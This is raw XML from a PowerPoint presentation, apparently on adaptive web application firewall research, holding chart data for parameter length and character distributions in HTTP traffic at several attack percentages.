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B2B2B2"/>
    <a:srgbClr val="FF7401"/>
    <a:srgbClr val="FC9204"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="FF3300"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="EB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2083" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="99" d="100"/>
          <a:sy n="99" d="100"/>
        </p:scale>
        <p:origin x="-72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S:\dokumenty\darek\nauka\artykuly\AdativeWAF\dane_do_artykulu\length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S:\dokumenty\darek\nauka\artykuly\AdativeWAF\dane_do_artykulu\length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S:\dokumenty\darek\nauka\artykuly\AdativeWAF\dane_do_artykulu\length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S:\dokumenty\darek\nauka\artykuly\AdativeWAF\dane_do_artykulu\length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S:\dokumenty\darek\nauka\artykuly\AdativeWAF\dane_do_artykulu\char_distrib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S:\dokumenty\darek\nauka\artykuly\AdativeWAF\dane_do_artykulu\char_distrib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S:\dokumenty\darek\nauka\artykuly\AdativeWAF\dane_do_artykulu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err="1"/>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>distribution</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>percent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" baseline="0" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" baseline="0" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" baseline="0" dirty="0"/>
              <a:t> = 0%)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Number of occurences</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:xVal>
            <c:numRef>
              <c:f>Arkusz1!$A$2:$A$11</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1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22</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:xVal>
          <c:yVal>
            <c:numRef>
              <c:f>Arkusz1!$B$2:$B$11</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="10"/>
                <c:pt idx="0">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>91</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>59</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>143</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>59</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>300</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>17</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>181</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>109</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>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736000"/>
        <c:axId val="105213952"/>
      </c:scatterChart>
      <c:valAx>
        <c:axId val="98736000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sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" err="1">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>Parameter</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" err="1">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>length</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> [</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" err="1" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>number</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" err="1" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>characters</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>]</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="pl-PL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5213952"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="midCat"/>
        <c:minorUnit val="1"/>
      </c:valAx>
      <c:valAx>
        <c:axId val="105213952"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="4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Number of occurences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87360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1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>distribution</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>percent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> = 0.1%)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0">
              <a:effectLst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Arkusz1!$A$16:$A$26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22</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>29</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:xVal>
          <c:yVal>
            <c:numRef>
              <c:f>Arkusz1!$B$16:$B$26</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="11"/>
                <c:pt idx="0">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>84</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>54</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>163</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>68</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>319</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>172</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>93</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>33</c:v>
                </c:pt>
                <c:pt idx="10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18112"/>
        <c:axId val="31819648"/>
      </c:scatterChart>
      <c:valAx>
        <c:axId val="31818112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sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" err="1">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>Parameter</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" err="1">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>length</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> [</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" err="1" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>number</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" err="1" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>characters</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" sz="1000" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>]</a:t>
                </a:r>
                <a:endParaRPr lang="pl-PL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1819648"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="midCat"/>
        <c:minorUnit val="1"/>
      </c:valAx>
      <c:valAx>
        <c:axId val="31819648"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="4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Number of occurences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181811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1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>distribution</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>percent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> = 1%)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0">
              <a:effectLst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Arkusz1!$A$31:$A$44</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1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22</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>29</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>33</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>36</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>65</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:xVal>
          <c:yVal>
            <c:numRef>
              <c:f>Arkusz1!$B$31:$B$44</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="14"/>
                <c:pt idx="0">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>103</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>59</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>164</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>269</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>176</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>117</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>34</c:v>
                </c:pt>
                <c:pt idx="10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43840"/>
        <c:axId val="31670272"/>
      </c:scatterChart>
      <c:valAx>
        <c:axId val="31843840"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="8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 err="1">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>Parameter</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="0" dirty="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="0" dirty="0" err="1">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>length</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="0" dirty="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> [</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="0" dirty="0" err="1" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>number</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="0" dirty="0" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="0" dirty="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="0" dirty="0" err="1" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>characters</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="0" dirty="0" smtClean="0">
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>]</a:t>
                </a:r>
                <a:endParaRPr lang="pl-PL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1670272"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="midCat"/>
        <c:minorUnit val="1"/>
      </c:valAx>
      <c:valAx>
        <c:axId val="31670272"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="4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Number of occurences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184384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1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>distribution</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>percent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" i="0" baseline="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> = 10%)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0">
              <a:effectLst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Arkusz1!$A$51:$A$65</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1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22</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>29</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>33</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>36</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>65</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>80</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:xVal>
          <c:yVal>
            <c:numRef>
              <c:f>Arkusz1!$B$51:$B$65</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="15"/>
                <c:pt idx="0">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>82</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>61</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>129</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>44</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>297</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>154</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>95</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>41</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>28</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>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694208"/>
        <c:axId val="31709056"/>
      </c:scatterChart>
      <c:valAx>
        <c:axId val="31694208"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="8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 err="1" smtClean="0"/>
                  <a:t>Parameter</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1"/>
                  <a:t>length</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>[</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>number</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0"/>
                  <a:t>of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>characters</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0"/>
                  <a:t>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1709056"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="midCat"/>
        <c:minorUnit val="1"/>
      </c:valAx>
      <c:valAx>
        <c:axId val="31709056"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="4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Number of occurences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169420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err="1"/>
              <a:t>Character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>distribution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" baseline="0" dirty="0" err="1"/>
              <a:t>values</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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Arkusz1!$C$3:$C$13</c:f>
                <c:numCache>
                  <c:formatCode>General</c:formatCode>
                  <c:ptCount val="11"/>
                  <c:pt idx="0">
                    <c:v>2.90545192629445E-2</c:v>
                  </c:pt>
                  <c:pt idx="1">
                    <c:v>2.6971673886206798E-3</c:v>
                  </c:pt>
                  <c:pt idx="2">
                    <c:v>3.08148791101958E-31</c:v>
                  </c:pt>
                  <c:pt idx="3">
                    <c:v>1.94537578507497E-4</c:v>
                  </c:pt>
                  <c:pt idx="4">
                    <c:v>5.2077145696230901E-31</c:v>
                  </c:pt>
                  <c:pt idx="5">
                    <c:v>5.2077145696230901E-31</c:v>
                  </c:pt>
                  <c:pt idx="6">
                    <c:v>3.7928916402478398E-4</c:v>
                  </c:pt>
                  <c:pt idx="7">
                    <c:v>2.0371735106836401E-3</c:v>
                  </c:pt>
                  <c:pt idx="8">
                    <c:v>2.0371735106836401E-3</c:v>
                  </c:pt>
                  <c:pt idx="9">
                    <c:v>6.7429184715516995E-4</c:v>
                  </c:pt>
                  <c:pt idx="10">
                    <c:v>6.9333477997940504E-33</c:v>
                  </c:pt>
                </c:numCache>
              </c:numRef>
            </c:plus>
            <c:minus>
              <c:numRef>
                <c:f>Arkusz1!$C$3:$C$13</c:f>
                <c:numCache>
                  <c:formatCode>General</c:formatCode>
                  <c:ptCount val="11"/>
                  <c:pt idx="0">
                    <c:v>2.90545192629445E-2</c:v>
                  </c:pt>
                  <c:pt idx="1">
                    <c:v>2.6971673886206798E-3</c:v>
                  </c:pt>
                  <c:pt idx="2">
                    <c:v>3.08148791101958E-31</c:v>
                  </c:pt>
                  <c:pt idx="3">
                    <c:v>1.94537578507497E-4</c:v>
                  </c:pt>
                  <c:pt idx="4">
                    <c:v>5.2077145696230901E-31</c:v>
                  </c:pt>
                  <c:pt idx="5">
                    <c:v>5.2077145696230901E-31</c:v>
                  </c:pt>
                  <c:pt idx="6">
                    <c:v>3.7928916402478398E-4</c:v>
                  </c:pt>
                  <c:pt idx="7">
                    <c:v>2.0371735106836401E-3</c:v>
                  </c:pt>
                  <c:pt idx="8">
                    <c:v>2.0371735106836401E-3</c:v>
                  </c:pt>
                  <c:pt idx="9">
                    <c:v>6.7429184715516995E-4</c:v>
                  </c:pt>
                  <c:pt idx="10">
                    <c:v>6.9333477997940504E-33</c:v>
                  </c:pt>
                </c:numCache>
              </c:numRef>
            </c:minus>
          </c:errBars>
          <c:cat>
            <c:strRef>
              <c:f>Arkusz1!$A$3:$A$13</c:f>
              <c:strCache>
                <c:ptCount val="11"/>
                <c:pt idx="0">
                  <c:v>e</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>p</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>s</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>l</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>d</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>t</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>a</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>o</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>v</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>r</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>_</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Arkusz1!$B$3:$B$13</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="11"/>
                <c:pt idx="0">
                  <c:v>0.26236753246752897</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.23256927404392999</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.20000000000000101</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.18096062144285599</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.16666666666666599</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.16666666666666599</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0.16278652223352699</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>0.145853252559662</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0.145853252559662</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>0.116284637021965</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>9.0909090909090995E-2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62304"/>
        <c:axId val="31763840"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="31762304"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="31763840"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="31763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E(fr)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1762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Character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" baseline="0"/>
              <a:t> distribution in parameter values</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/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Arkusz1!$B$25</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>e(x)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Arkusz1!$C$26:$C$104</c:f>
                <c:numCache>
                  <c:formatCode>General</c:formatCode>
                  <c:ptCount val="79"/>
                  <c:pt idx="0">
                    <c:v>1.3706766385595101E-3</c:v>
                  </c:pt>
                  <c:pt idx="1">
                    <c:v>2.7115670719086698E-3</c:v>
                  </c:pt>
                  <c:pt idx="2">
                    <c:v>1.41733951183109E-3</c:v>
                  </c:pt>
                  <c:pt idx="3">
                    <c:v>1.04459934959289E-3</c:v>
                  </c:pt>
                  <c:pt idx="4">
                    <c:v>2.4982641293409499E-3</c:v>
                  </c:pt>
                  <c:pt idx="5">
                    <c:v>1.15009400801675E-3</c:v>
                  </c:pt>
                  <c:pt idx="6">
                    <c:v>9.3244802115303701E-4</c:v>
                  </c:pt>
                  <c:pt idx="7">
                    <c:v>1.8038516555566699E-3</c:v>
                  </c:pt>
                  <c:pt idx="8">
                    <c:v>9.1162976964491297E-4</c:v>
                  </c:pt>
                  <c:pt idx="9">
                    <c:v>1.02394128963288E-3</c:v>
                  </c:pt>
                  <c:pt idx="10">
                    <c:v>1.8396878177830999E-3</c:v>
                  </c:pt>
                  <c:pt idx="11">
                    <c:v>1.18675866776381E-3</c:v>
                  </c:pt>
                  <c:pt idx="12">
                    <c:v>7.9608911894557804E-4</c:v>
                  </c:pt>
                  <c:pt idx="13">
                    <c:v>1.0915634227519899E-3</c:v>
                  </c:pt>
                  <c:pt idx="14">
                    <c:v>6.5880725967970598E-4</c:v>
                  </c:pt>
                  <c:pt idx="15">
